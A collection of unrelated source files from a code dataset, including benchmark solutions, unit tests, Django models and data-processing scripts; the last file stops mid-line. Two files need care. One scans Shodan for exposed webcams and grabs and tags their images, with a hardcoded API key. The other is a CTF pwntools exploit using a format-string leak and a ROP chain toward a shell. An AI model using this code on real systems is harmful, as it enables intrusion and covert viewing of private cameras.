+{"seq_id":"16800439","text":"import os\nimport shodan\nimport requests\nimport socket\nimport urllib\nfrom PIL import Image, ImageEnhance\nfrom rich import print\nfrom clarifai.rest import ClarifaiApp\n\nclass Scanner(object):\n    def __init__(self):\n        socket.setdefaulttimeout(5)\n        self.SHODAN_API_KEY = os.environ.get(\"SHODAN_API_KEY\")\n        assert self.SHODAN_API_KEY != \"\"\n        self.api = shodan.Shodan(self.SHODAN_API_KEY)\n        # preset url schemes\n        self.default_url_scheme = \"[link=http://{ip}:{port}][i][green]{ip}[/green]:[red]{port}[/red][/link]\"\n        self.MJPG_url_scheme = \"[link=http://{ip}:{port}/?action=stream][i]http://[green]{ip}[/green]:[red]{port}[/red]\" \\\n                               \"[blue]/?action=stream[/blue][/link]\"\n        self.clarifai_initialized = False\n\n    def init_clarifai(self):\n        self.CLARIFAI_API_KEY = os.environ.get(\"CLARIFAI_API_KEY\")\n        assert self.CLARIFAI_API_KEY != \"\"\n        self.clarifai_app = ClarifaiApp(api_key='ac61aa2283a04f54bffb59bbae86206e')\n        self.clarifai_model = self.clarifai_app.public_models.general_model\n        self.clarifai_initialized = True\n\n    def tag_image(self,url):\n        response = self.clarifai_model.predict_by_url(url=url)\n        results = [concept['name'] for concept in response['outputs'][0]['data']['concepts']]\n        return results\n\n    def check_empty(self,image_source,tolerance=5)->bool:\n        im_loc = \".tmpimage\"\n        urllib.request.urlretrieve(image_source, im_loc)\n        im = Image.open(im_loc)\n        extrema = im.convert(\"L\").getextrema()\n        if abs(extrema[0]-extrema[1]) <= tolerance:\n            return False\n        return True\n\n    def scan(self, camera_type, url_scheme = '', check_empty_url='',check_empty = True, tag=False):\n        if url_scheme == '':\n            url_scheme = self.default_url_scheme\n\n        if tag and (not self.clarifai_initialized):\n            self.init_clarifai()\n\n        results = self.api.search(\"webcams\")\n        max_time = len(results[\"matches\"])*10\n        print(f\"maximum time:{max_time} seconds\")\n        for result in results[\"matches\"]:\n            if camera_type in result[\"data\"]:\n                url = f\"http://{result['ip_str']}:{result['port']}\"\n                try:\n                    r = requests.get(url, timeout=5)\n                    if r.status_code == 200:\n                        if check_empty == False:\n                            print(\n                                url_scheme.format(ip=result['ip_str'], port=result['port'])\n                            )\n                            continue\n                        if self.check_empty(check_empty_url.format(url=url)):\n                            print(\n                                url_scheme.format(ip=result['ip_str'], port=result['port'])\n                            )\n                            if tag:\n                                for t in self.tag_image(check_empty_url.format(url=url)):\n                                    print(f\"[green]{t}[/green]\",end=\" \")\n                                print()\n                except:\n                    continue\n\n    def MJPG(self,check,tag):\n        scheme = self.MJPG_url_scheme\n        if check:\n            self.scan(\"MJPG-streamer\", url_scheme=scheme, check_empty_url=\"{url}/?action=snapshot\",tag=tag)\n        else:\n            self.scan(\"MJPG-streamer\", url_scheme=scheme, 
check_empty_url=\"{url}/?action=snapshot\",tag=tag)\n\n    def webcamXP(self,check,tag):\n        if check:\n            self.scan(\"webcamXP\", check_empty_url='{url}/cam_1.jpg', tag=tag)\n        else:\n            self.scan(\"webcamXP\",check_empty_url='{url}/cam_1.jpg',tag=tag)","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"360566347","text":"from tool.runners.python import SubmissionPy\nfrom collections import defaultdict\n\n\nclass YouyounSubmission(SubmissionPy):\n\n    def run(self, s):\n        \"\"\"\n        :param s: input in string format\n        :return: solution flag\n        \"\"\"\n        mem = defaultdict(list)\n        turn = 1\n        init = s.splitlines()[0].split(',')\n        while turn <= len(init):\n            last_spoken = int(init[turn - 1])\n            mem[last_spoken].append(turn)\n            turn += 1\n        while turn < 30000001:\n            if len(mem[last_spoken]) >= 2:\n                last_spoken = mem[last_spoken][-1] - mem[last_spoken][-2]\n            else:\n                last_spoken = 0\n            mem[last_spoken].append(turn)\n            turn += 1\n        return last_spoken\n\n\nif __name__ == '__main__':\n    print(YouyounSubmission().run(open('../input/youyoun.txt').read()))\n","sub_path":"day-15/part-2/youyoun.py","file_name":"youyoun.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"45055148","text":"from pwn import *\n\nlibc_offset = 0x1eb723\npie_offset = 0x1570 \nret_offset = 0x1525\nmain_offset = 0x1526\n\npop_rdi_offset = 0x015d3\n\nbinsh_offset = 0x1b6613\nsystem_offset = 0x49a50\nsystem_offset = 0x554e0\nexit_offset = 0x3f090\nexit_offset = 0xe5fb0\n\nflag = \"SCG{NOW_GET_VOLDEMORT}\"\n#all addresses up to 49\nleak = \"AAAA %1$lp %3$lp %8$lp %39$lp %40$lp %42$lp %44$lp %45$lp %47$lp BBBB\"\nspell = \"Expelliarmus\\x00\"\n\n#p = remote(\"172.17.0.4\",1024)\n#p = remote(\"hax1.allesctf.net\",9102)\np = process(\"./pwn3\")\n\nprint(p.recvline())\np.sendline(flag)\nprint(p.recvuntil(\"name:\"))\np.sendline(leak)\ntmp = p.recvuntil(\"spell:\")\n\nprint(tmp.split())\n\npad = cyclic(0xff+0xf)\ntmp = tmp.split()\nIOstdout = int(tmp[-14],16) - 131 #offset 0x1eb6a0\nGIlibcwrite = int(tmp[-13],16) - 23 #offset 0x111300\nlibcstartmain = int(tmp[-7],16) - 243 #offset 0x270f0\nlog.info(\"Stack Canary: {}\".format(tmp[4]))\nlog.info(\"<_IO_2_1_stdout_>@libc: {}\".format(hex(IOstdout)))\nlog.info(\"<__GI___libc_write>@libc: {}\".format(hex(GIlibcwrite)))\nlog.info(\"<__libc_start_main>@libc: {}\".format(hex(libcstartmain)))\n\nraw_input(\"Exploit ?\")\nidx = cyclic_find(\"cnaacoaa\")\n\nprint(p.clean()) # clean socket buffer (read all and print)\np.sendline(spell+pad[:idx]+p64(canary)+\"BBBBBBBB\"+p64(pop_rdi)+p64(LIBC_START_MAIN)+p64(PUTS)+p64(MAIN))\nprint(p.recvline())\n#p.sendline(spell+pad[:idx]+p64(canary)+\"BBBBBBBB\"+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system))\n#p.sendline(spell+pad[:idx]+p64(canary)+p64(exit)+p64(ret)+p64(pop_rdi)+p64(system)+p64(exit)+p64(bin_sh))#+p64(system))\n#p.interactive()\np.clean()\np.close()\n\n'''\nREMOTe\n[*] <_IO_2_1_stdout_>@libc: 0x7fc73035b6a0\n[*] <__GI___libc_write>@libc: 0x7fc730281300\n[*] <__libc_start_main>@libc: 0x7fc7301970f0\n\nLOCAL\n[*] <_IO_2_1_stdout_>@libc: 0x7fc73035b6a0\n[*] <__GI___libc_write>@libc: 0x7fc730281300\n[*] <__libc_start_main>@libc: 0x7fc7301970f0\n'''","sub_path":"cscg/pwn/pwn3/leak.py","file_name":"leak.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"623743327","text":"import os\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\nengine = create_engine(os.getenv(\"DATABASE_URL\"))\ndb = scoped_session(sessionmaker(bind=engine))\n\ndef main():\n    list = db.execute(\"SELECT * FROM books JOIN authors ON authors.id = books.author_id\").fetchall()\n    for row in list:\n        print(f\"{row.isbn} - {row.title} - {row.author} - {row.year}\")\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"411227030","text":"# Copyright 2013 Canonical Ltd.\n# All Rights Reserved.\n#\n#    Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n#    not use this file except in compliance with the License. You may obtain\n#    a copy of the License at\n#\n#         http://www.apache.org/licenses/LICENSE-2.0\n#\n#    Unless required by applicable law or agreed to in writing, software\n#    distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n#    License for the specific language governing permissions and limitations\n#    under the License.\n\"\"\" Tests for create_volume TaskFlow \"\"\"\n\nimport mock\n\nfrom cinder import context\nfrom cinder import exception\nfrom cinder import test\nfrom cinder.tests.unit import fake_consistencygroup\nfrom cinder.tests.unit import fake_snapshot\nfrom cinder.tests.unit import fake_volume\nfrom cinder.tests.unit.volume.flows import fake_volume_api\nfrom cinder.volume.flows.api import create_volume\nfrom cinder.volume.flows.manager import create_volume as create_volume_manager\n\n\nclass CreateVolumeFlowTestCase(test.TestCase):\n\n    def time_inc(self):\n        self.counter += 1\n        return self.counter\n\n    def setUp(self):\n        super(CreateVolumeFlowTestCase, self).setUp()\n        self.ctxt = context.get_admin_context()\n        self.counter = float(0)\n\n        # Ensure that time.time() always returns more than the last time it was\n        # called to avoid div by zero errors.\n        self.counter = float(0)\n\n    @mock.patch('time.time', side_effect=time_inc)\n    @mock.patch('cinder.objects.ConsistencyGroup.get_by_id')\n    def test_cast_create_volume(self, consistencygroup_get_by_id, mock_time):\n        props = {}\n        consistencygroup_obj = \\\n            fake_consistencygroup.fake_consistencyobject_obj(\n                self.ctxt, consistencygroup_id=1, host=None)\n        consistencygroup_get_by_id.return_value = consistencygroup_obj\n        spec = {'volume_id': None,\n                'source_volid': None,\n                'snapshot_id': None,\n                'image_id': None,\n                'source_replicaid': None,\n                'consistencygroup_id': None,\n                'cgsnapshot_id': None}\n\n        # Fake objects assert specs\n        task = create_volume.VolumeCastTask(\n            fake_volume_api.FakeSchedulerRpcAPI(spec, self),\n            fake_volume_api.FakeVolumeAPI(spec, self),\n            fake_volume_api.FakeDb())\n\n        task._cast_create_volume(self.ctxt, spec, props)\n\n        spec = {'volume_id': 1,\n                'source_volid': 2,\n                'snapshot_id': 3,\n                'image_id': 4,\n                'source_replicaid': 5,\n                'consistencygroup_id': 5,\n                'cgsnapshot_id': None}\n\n        # Fake objects assert specs\n        task = create_volume.VolumeCastTask(\n            fake_volume_api.FakeSchedulerRpcAPI(spec, self),\n            fake_volume_api.FakeVolumeAPI(spec, self),\n            fake_volume_api.FakeDb())\n\n        task._cast_create_volume(self.ctxt, spec, props)\n        consistencygroup_get_by_id.assert_called_once_with(self.ctxt, 5)\n\n\nclass CreateVolumeFlowManagerTestCase(test.TestCase):\n\n    def setUp(self):\n        super(CreateVolumeFlowManagerTestCase, self).setUp()\n        self.ctxt = context.get_admin_context()\n\n    @mock.patch('cinder.volume.flows.manager.create_volume.'\n                
'CreateVolumeFromSpecTask.'\n                '_handle_bootable_volume_glance_meta')\n    @mock.patch('cinder.objects.Snapshot.get_by_id')\n    def test_create_from_snapshot(self, snapshot_get_by_id, handle_bootable):\n        fake_db = mock.MagicMock()\n        fake_driver = mock.MagicMock()\n        fake_manager = create_volume_manager.CreateVolumeFromSpecTask(\n            fake_db, fake_driver)\n        volume = fake_volume.fake_db_volume()\n        orig_volume_db = mock.MagicMock(id=10, bootable=True)\n        snapshot_obj = fake_snapshot.fake_snapshot_obj(self.ctxt)\n        snapshot_get_by_id.return_value = snapshot_obj\n        fake_db.volume_get.return_value = orig_volume_db\n\n        fake_manager._create_from_snapshot(self.ctxt, volume,\n                                           snapshot_obj.id)\n        fake_driver.create_volume_from_snapshot.assert_called_once_with(\n            volume, snapshot_obj)\n        fake_db.volume_get.assert_called_once_with(self.ctxt,\n                                                   snapshot_obj.volume_id)\n        handle_bootable.assert_called_once_with(self.ctxt, volume['id'],\n                                                snapshot_id=snapshot_obj.id)\n\n    @mock.patch('cinder.objects.Snapshot.get_by_id')\n    def test_create_from_snapshot_update_failure(self, snapshot_get_by_id):\n        fake_db = mock.MagicMock()\n        fake_driver = mock.MagicMock()\n        fake_manager = create_volume_manager.CreateVolumeFromSpecTask(\n            fake_db, fake_driver)\n        volume = fake_volume.fake_db_volume()\n        snapshot_obj = fake_snapshot.fake_snapshot_obj(self.ctxt)\n        snapshot_get_by_id.return_value = snapshot_obj\n        fake_db.volume_get.side_effect = exception.CinderException\n\n        self.assertRaises(exception.MetadataUpdateFailure,\n                          fake_manager._create_from_snapshot, self.ctxt,\n                          volume, snapshot_obj.id)\n        fake_driver.create_volume_from_snapshot.assert_called_once_with(\n            volume, snapshot_obj)\n","sub_path":"cinder/tests/unit/volume/flows/test_create_volume_flow.py","file_name":"test_create_volume_flow.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"620354303","text":"#!/usr/bin/python3\n\nimport subprocess\nimport os\nimport sys\nimport time\nimport unittest\nimport tarfile\n\n# Pick a unique port for this user\nPORT = str(50000+int(os.getenv('SSH_TTY').split('/')[3]))\n\ndef run(cmd):\n    \"\"\"Run a command with given parameters return the return code, stdout and stderr\"\"\"\n    result = subprocess.run(\n        cmd,\n        stdout=subprocess.PIPE,\n        stderr=subprocess.PIPE)\n    out = result.stdout.decode('utf-8')\n    err = result.stderr.decode('utf-8')\n    return result.returncode, out, err\n\n\n    def runin(cmd, stdin):\n        \"\"\"Run a command with given parameters and given input return the return code\"\"\"\n        result = subprocess.Popen(cmd,stdin=subprocess.PIPE)\n        result.wait()\n        return result.returncode\n\n\n    def run_server():\n        \"\"\"Run the server\"\"\"\n        pid = subprocess.Popen([\"./server\", \"-p\", PORT]).pid\n        # Give the server time to start\n        time.sleep(0.1)\n        return pid\n\n\n    def kill_server(pid):\n        \"\"\"kill the server\"\"\"\n        subprocess.run([\"kill\", str(pid)])\n\n\nclass TestCases(unittest.TestCase):\n\n    def setUp(self):\n        \"\"\"Run before every test\"\"\"\n        print(\"setUp()\", os.path.exists('./testdatas'))\n        if not os.path.exists('./testdatas'):\n            print('Creating server test data directory')\n            os.mkdir('./testdatas')\n        if not os.path.exists('./testdatac'):\n            print('Creating client test data directory')\n            os.mkdir('./testdatac')\n        if os.path.exists('testdata.tar'):\n            print('Extracting test data')\n            tar = tarfile.open('testdata.tar')\n            tar.extractall()\n            tar.close()\n        else:\n            print('No testdata.tar file found!', file=sys.stderr)\n\n    def tearDown(self):\n        \"\"\"Run after every test\"\"\"\n        pass\n\n    def test_nothing(self):\n        pass\n\n    def test_server_no_port(self):\n        \"\"\"Verify the server error when no port\"\"\"\n        (code, out, err) = run([\"./server\"]);\n        self.assertEqual(code, 1)\n\n    def test_client_no_host(self):\n        \"\"\"Verify the client error when no port\"\"\"\n        (code, out, err) = run([\"./client\", \"-p\",\"12345\", \"hello.txt\"]);\n        self.assertEqual(code, 1)\n\n    def test_client_no_port(self):\n        \"\"\"Verify the client error when no port\"\"\"\n        (code, out, err) = run([\"./client\", \"-h\",\"localhost\", \"hello.txt\"]);\n        self.assertEqual(code, 1)\n\n#    def test_first_server_test(self):\n#        \"\"\"Verify the server outputs are as expected\"\"\"\n#        (code, out, err) = run([\"./server\", \"-p\", \"12345\"]);\n#        self.assertEqual(code, 0)\n#        self.assertEqual(out, 'PORT: 12345\\n')\n#        self.assertEqual(err, '')\n#\n#    def test_first_client_test(self):\n#        \"\"\"Verify the client outputs are as expected\"\"\"\n#        (code, out, err) = run([\"./client\", \"-h\",\"localhost\", \"-p\",\"12345\", \"hello.txt\"]);\n#        self.assertEqual(code, 0)\n#        self.assertEqual(out, 'HOST: localhost PORT: 12345 hello.txt\\n')\n#        self.assertEqual(err, '')\n#\n#    def test_first_client_server(self):\n#        pid = run_server()\n#        code = runin([\"./client\", \"-p\", PORT, \"-h\", \"localhost\"], \"quit\\n\")\n#        self.assertEqual(code, 0)\n#        kill_server(pid)\n\n\nif __name__ == '__main__':\n    
print(\"Port:\",PORT)\n    unittest.main()\n","sub_path":"cst-240-Unix/Lab6/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"75968700","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom product.models import Product, Category\nfrom django.template.defaultfilters import slugify\n\n# Create your models here.\n\n\ndef get_file_path(instance, filename):\n    return \"files/auraai/\" + str(instance.id) + \"_\" + filename\n\n\ndef f(instance, filename):\n    return \"files/tag/banner\" + filename\n\n\nclass UserImage(models.Model):\n    FOCUS_ON = (\n        (\"TOP\", \"top\"),\n        (\"BOTTOM\", \"bottom\"),\n        (\"WHOLE\", \"whole\")\n    )\n    url = models.URLField(max_length=2000, blank=True)\n    imported_from = models.CharField(max_length=200, blank=True)\n    uploader = models.ForeignKey(User, blank=True, null=True)\n    upload_date = models.DateField(auto_now=False, auto_now_add=True)\n    image_for = models.CharField(\n        max_length=60, blank=True, choices=FOCUS_ON, default=FOCUS_ON[2])\n    active = models.BooleanField(default=True)\n    likes_top = models.IntegerField(default=0)\n    likes_bottom = models.IntegerField(default=0)\n    likes_whole = models.IntegerField(default=0)\n    dislike = models.IntegerField(default=0)\n    priority = models.IntegerField(default=0)\n    riplicable = models.BooleanField(default=True)\n    photo = models.ImageField(upload_to=get_file_path, blank=True, null=True)\n    relevent = models.BooleanField(default=True)\n\n\nclass UserPhysique(models.Model):\n    BODY_TYPE_CHOICE = (\n        (\"AVERAGE\", \"average\"),\n        (\"EXTRA\", \"extra\"),\n        (\"ATHLETIC\", \"athletic\"),\n        (\"SLIM\", \"slim\"),\n        (\"BIG&BOLD\", \"big&bold\"),\n        (\"MUSCULAR\", \"muscular\")\n    )\n    HAIR_COLOR_CHOICE = (\n        (\"BLACK\", \"black\"),\n        (\"BROWN\", \"brown\"),\n        (\"GREEN\", \"green\"),\n        (\"BLUE\", \"BLUE\"),\n        (\"GREY\", \"grey\"),\n        (\"HAZEL\", \"hazel\")\n    )\n    EYE_COLOR_CHOICE = (\n        (\"BLACK\", \"black\"),\n        (\"BROWN\", \"brown\"),\n        (\"RED\", \"red\"),\n        (\"BLOND\", \"blond\"),\n        (\"GREY\", \"grey\"),\n        (\"WHITE\", \"white\"),\n        (\"SHAVED\", \"shaved\"),\n        (\"DYED\", \"dyed\"),\n        (\"BULD\", \"buld\")\n    )\n    GENDER_CHOICE = (\n        (\"MALE\", \"male\"),\n        (\"FEMALE\", \"female\"),\n        (\"OTHER\", \"other\")\n    )\n    user = models.ForeignKey(User, blank=True, null=True)\n    create_date = models.DateField(auto_now=False, auto_now_add=True)\n    height = models.IntegerField(default=0)\n    weight = models.IntegerField(default=0)\n    body_type = models.CharField(\n        max_length=60, blank=True, choices=BODY_TYPE_CHOICE, default=BODY_TYPE_CHOICE[0])\n    hair_color = models.CharField(\n        max_length=60, blank=True, choices=HAIR_COLOR_CHOICE, default=HAIR_COLOR_CHOICE[0])\n    eye_color = models.CharField(\n        max_length=60, blank=True, choices=EYE_COLOR_CHOICE, default=EYE_COLOR_CHOICE[0])\n    gender = models.CharField(\n        max_length=20, blank=True, choices=GENDER_CHOICE, default=GENDER_CHOICE[0])\n    age = models.IntegerField(default=1)\n\n\nclass UserFbLikes(models.Model):\n    user = models.ForeignKey(User, blank=False, null=False)\n    fb_page = models.CharField(max_length=300, blank=True)\n    page_id = models.CharField(max_length=30, blank=True)\n\n\nclass UserFbDetails(models.Model):\n    user = models.ForeignKey(User, blank=False, null=False)\n    user_email = models.EmailField(max_length=260, 
blank=True)\n    fb_id = models.CharField(max_length=30, blank=True)\n    token = models.CharField(max_length=300, blank=True)\n\n\nclass Tag(models.Model):\n    category = models.ForeignKey(Category)\n    tag = models.CharField(max_length=150, blank=False)\n\n    def __str__(self):\n        return self.tag\n\n    def __unicode__(self):\n        return self.tag\n\n\nclass ProductTagMap(models.Model):\n    product = models.ForeignKey(Product)\n    tag = models.ForeignKey(Tag)\n\n    def __str__(self):\n        return str(self.product) + '-' + str(self.tag)\n\n    def __unicode__(self):\n        return str(self.product) + '-' + str(self.tag)\n\n\nclass TagBanner(models.Model):\n    banner_name = models.CharField(max_length=50, blank=False)\n    tags = models.ManyToManyField(Tag)\n    active = models.BooleanField(default=True)\n    slug = models.SlugField(max_length=200, blank=True, null=True)\n    banner_image = models.ImageField(upload_to=f,\n                                     default='uploads/blogimages/dummy.jpg',\n                                     blank=True,\n                                     null=True)\n\n    def save(self, *args, **kwargs):\n        if not self.slug:\n            self.slug = slugify(self.banner_name)\n        super(TagBanner, self).save(*args, **kwargs)\n\n    def __str__(self):\n        return self.banner_name + str(' Active' if self.active else ' Deactive')\n\n    def __unicode__(self):\n        return self.banner_name + str(' Active' if self.active else ' Deactive')\n","sub_path":"auraai/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"76269960","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar  9 22:50:40 2017\n\n@author: sthar\n\"\"\"\n\n__author__ = 'Bharat'\nfrom skimage.segmentation import slic\nfrom skimage import io\nimport numpy as np\nimport time\nimport os\n\n\n########### PARAMETER DEFINITION #############\nrgb_dir = '..\\dataset\\CITYSCAPE\\RGB\\\\' # Location of folder containing the RGB images of the dataset\nSLIC_dir = '..\\dataset\\CITYSCAPE\\SLIC\\\\'\n\nlist_start = 1001\nlist_end = 1499\n\nnumSegments = 2000\n\nsigma = 2  # Sigma value of Gaussian Smoothening Applied before SLIC\n\n############################################\n\n#### Main Part of Program START ###########\n\nprint('Starting SLIC with List no {0} until {1}'.format(list_start, list_end))\n\nstart_time = time.time()\n\n# Get List of RGB Image files from directory (relative location)\nlist_files = os.listdir(rgb_dir)\nlist_files.sort()\n\nfor im_no in range(list_start, list_end+1):\n    image = io.imread(rgb_dir+list_files[im_no])\n    segments = slic(image, n_segments = numSegments, sigma = sigma)\n    np.save(SLIC_dir + list_files[im_no].rsplit(\".\",1)[0] + '.npy',segments)\n    print(im_no)\n\nend_time = time.time()\n\nprint('{0} Files Processed. Time Taken: {1}'.format(list_end-list_start+1, end_time-start_time))","sub_path":"utils/SuperPixel_Batch_Cityscapes.py","file_name":"SuperPixel_Batch_Cityscapes.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"451354558","text":"# Copyright (c) 2012-2021, Mark Peek \n# All rights reserved.\n#\n# See LICENSE file for full license.\n\nfrom typing import Optional\n\nfrom .aws import Action as BaseAction\nfrom .aws import BaseARN\n\nservice_name = \"Amazon DataZone\"\nprefix = \"datazone\"\n\n\nclass Action(BaseAction):\n    def __init__(self, action: Optional[str] = None) -> None:\n        super().__init__(prefix, action)\n\n\nclass ARN(BaseARN):\n    def __init__(self, resource: str = \"\", region: str = \"\", account: str = \"\") -> None:\n        super().__init__(\n            service=prefix, resource=resource, region=region, account=account\n        )\n\n\nGetProject = Action(\"GetProject\")\nGetProjectConfiguration = Action(\"GetProjectConfiguration\")\nGetProjectCredentials = Action(\"GetProjectCredentials\")\nListProjects = Action(\"ListProjects\")\nListUserProjects = Action(\"ListUserProjects\")\n","sub_path":"awacs/datazone.py","file_name":"datazone.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"36019655","text":"# this module will host a bunch of helper functions while we figure what all we can fo with the graph api.\n# once we figure that out, we will re-organize this module\nimport matplotlib.pyplot as plt\nplt.rcdefaults()\nimport numpy as np\n\ndef read_access_token_from_file(local_file_name):\n    with open(local_file_name, \"r\") as fid:\n        return fid.readline()\n    \ndef convert_time_zone(from_date_time, from_zone='UTC', to_zone='America/New_York'):\n    from datetime import datetime\n    from dateutil import tz\n    from_zone, to_zone = tz.gettz(from_zone), tz.gettz(to_zone)\n    # Tell the datetime object that it's in from_zone time zone since datetime objects are 'naive' by default    \n    from_date_time = from_date_time.replace(tzinfo=from_zone)\n    return from_date_time.astimezone(to_zone)\n\ndef plot_bar_chart(objects, values, y_label, title, x_label_rotation=70, x_label_fontsize=8):\n    y_pos = np.arange(len(objects))\n    plt.bar(y_pos, values, align='center', alpha=0.5)\n    plt.xticks(y_pos, objects, rotation=x_label_rotation, fontsize=x_label_fontsize)\n    plt.ylabel(y_label)\n    plt.title(title)\n    plt.grid()\n    plt.show()    \n    return\n\ndef plot_pie_chart(values, labels, title, explode=None, show_legend=True, hide_labels_in_chart=False, smart_legends = False):\n    explode = explode if explode else [0.0 for _ in labels]\n    if hide_labels_in_chart:\n        plt.pie(values, explode=explode, startangle=90)\n    else:\n        plt.pie(values, labels=labels, explode=explode, startangle=90)        \n    if show_legend:\n        if smart_legends:\n            total_sum = sum(values)\n            smart_legend_labels = []\n            for value, label in zip(values, labels):\n                percentage = ''.join([str(round(value*100/total_sum, 2)), '%'])\n                smart_label = \"%s: (%s, %s).\"%(label, str(percentage), value)\n                smart_legend_labels.append(smart_label)\n            plt.legend(labels=smart_legend_labels)\n        else:\n            plt.legend(labels=labels)            \n    plt.title(title)\n    plt.show()    \n    return","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"470763397","text":"#/usr/bin/python\r\n#coding:utf-8\r\n\r\n\r\nimport os\r\nimport struct\r\nfrom sys import exit\r\nimport sys\r\nimport csv\r\n\r\nimport numpy\r\nimport numpy as np\r\n\r\n\r\nimport tkinter\r\nimport tkinter.filedialog\r\nfrom time import sleep\r\n\r\nprint('jwsファイルをcsvに一括変換します')\r\nsleep(0.5)\r\nprint('csvファイルはdataフォルダに保存されます')\r\nsleep(0.5)\r\nprint(' ')\r\n\r\n#######################################################################################\r\nfor i in range(3):\r\n    try:\r\n        print('測定開始波長(低波長側)を入力してください。 デフォルト値:300 ')\r\n        x_for_first_point = input()\r\n        if x_for_first_point == \"\":\r\n            x_for_first_point = 300\r\n        \r\n        x_for_first_point = int(x_for_first_point)\r\n\r\n        print('測定開始波長(高波長側)を入力してください。 デフォルト値:2500')\r\n        x_for_last_point = input()\r\n        if x_for_last_point == \"\":\r\n            x_for_last_point = 2500\r\n\r\n        x_for_last_point = int(x_for_last_point)\r\n\r\n        print('測定波長刻���を入力してください。 デフォルト値:5')\r\n        x_step = input()\r\n        if x_step == \"\":\r\n            x_step = 5\r\n        x_step = int(x_step)\r\n\r\n        # (2500-300)/ 5 + 1 = 441 *測定波長の数\r\n        x_point_number = (x_for_last_point - x_for_first_point) / x_step + 1\r\n        \r\n    except:\r\n        if i!=2:\r\n            print('入力データが整数値ではありません。再度入力してください')\r\n    else:\r\n        break\r\nelse:\r\n    print('入力データが整数値ではありません。プログラムを終了します。')\r\n    sleep(2)\r\n    exit()\r\n\r\nprint('')\r\nprint('測定開始波長',x_for_first_point)\r\nprint('測定終了波長',x_for_last_point)\r\nprint('測定波長刻み',x_step)\r\nsleep(0.5)\r\n\r\n#######################################################################################\r\nfor i in range(3):\r\n    try:\r\n        print('S偏光データとP偏光データを合成しますか。yes/no デフォルト値:yes ')\r\n        answer = input()\r\n        if answer in ['yes','y','ye','']:\r\n            is_synthesizing = True\r\n            sleep(0.2)\r\n            print('S偏光データとP偏光データを合成します')\r\n\r\n        elif answer in ['no','n']:\r\n            is_synthesizing = False\r\n            sleep(0.2)\r\n            print('データを合成しません')\r\n    except:\r\n        if i!=2:\r\n            print('再度入力してください')\r\n    else:\r\n        break\r\nelse:\r\n    print('プログラムを終了します。')\r\n    sleep(2)\r\n    exit()\r\n\r\n\r\n#######################################################################################\r\n\r\ntk = tkinter.Tk()\r\ntk.withdraw()\r\ncurrentdirectory = os.getcwd()\r\n\r\nprint('jwsファイルを選んでください')\r\nsleep(0.3)\r\n\r\njwsfile_path  = tkinter.filedialog.askopenfilename(initialdir = currentdirectory, \r\ntitle = 'jwsファイルを1つ選択してください。 同フォルダ内のすべてのjwsファイルを変換します。', filetypes = [('jws File', '*.jws')])\r\njwsfolder_path = os.path.dirname(jwsfile_path)\r\nos.chdir(jwsfolder_path)\r\n\r\ntry:\r\n    filelist = os.walk(jwsfolder_path).__next__()[2]\r\nexcept:\r\n    filelist = os.walk(jwsfolder_path).next()[2]\r\n\r\n#拡張子が.jwsであるファイルを抽出\r\nfilelist_jws = [os.path.splitext(i)[0] for i in filelist if os.path.splitext(i)[1]=='.jws']\r\n\r\n#ファイル名末尾がs-1やp-1であるファイルを抽出\r\nfilelist_jws_s = [i for i in filelist_jws if i[-3:] == 's-1' or i[-3:] == 'S-1']\r\nfilelist_jws_p = [i for i in filelist_jws if i[-3:] == 'p-1' or i[-3:] == 'P-1']\r\n\r\n#ファイル名末尾がs-1やp-1であるファイルを抽出し、末尾を除いたファイル名を取得\r\n#.lowerで大文字を全て小文字に変換\r\nfilelist_jws_s_ext = [i[:-3].lower() for i in filelist_jws if i[-3:] == 's-1' or i[-3:] == 'S-1']\r\nfilelist_jws_p_ext = [i[:-3].lower() for i in filelist_jws if i[-3:] == 'p-1' or i[-3:] == 
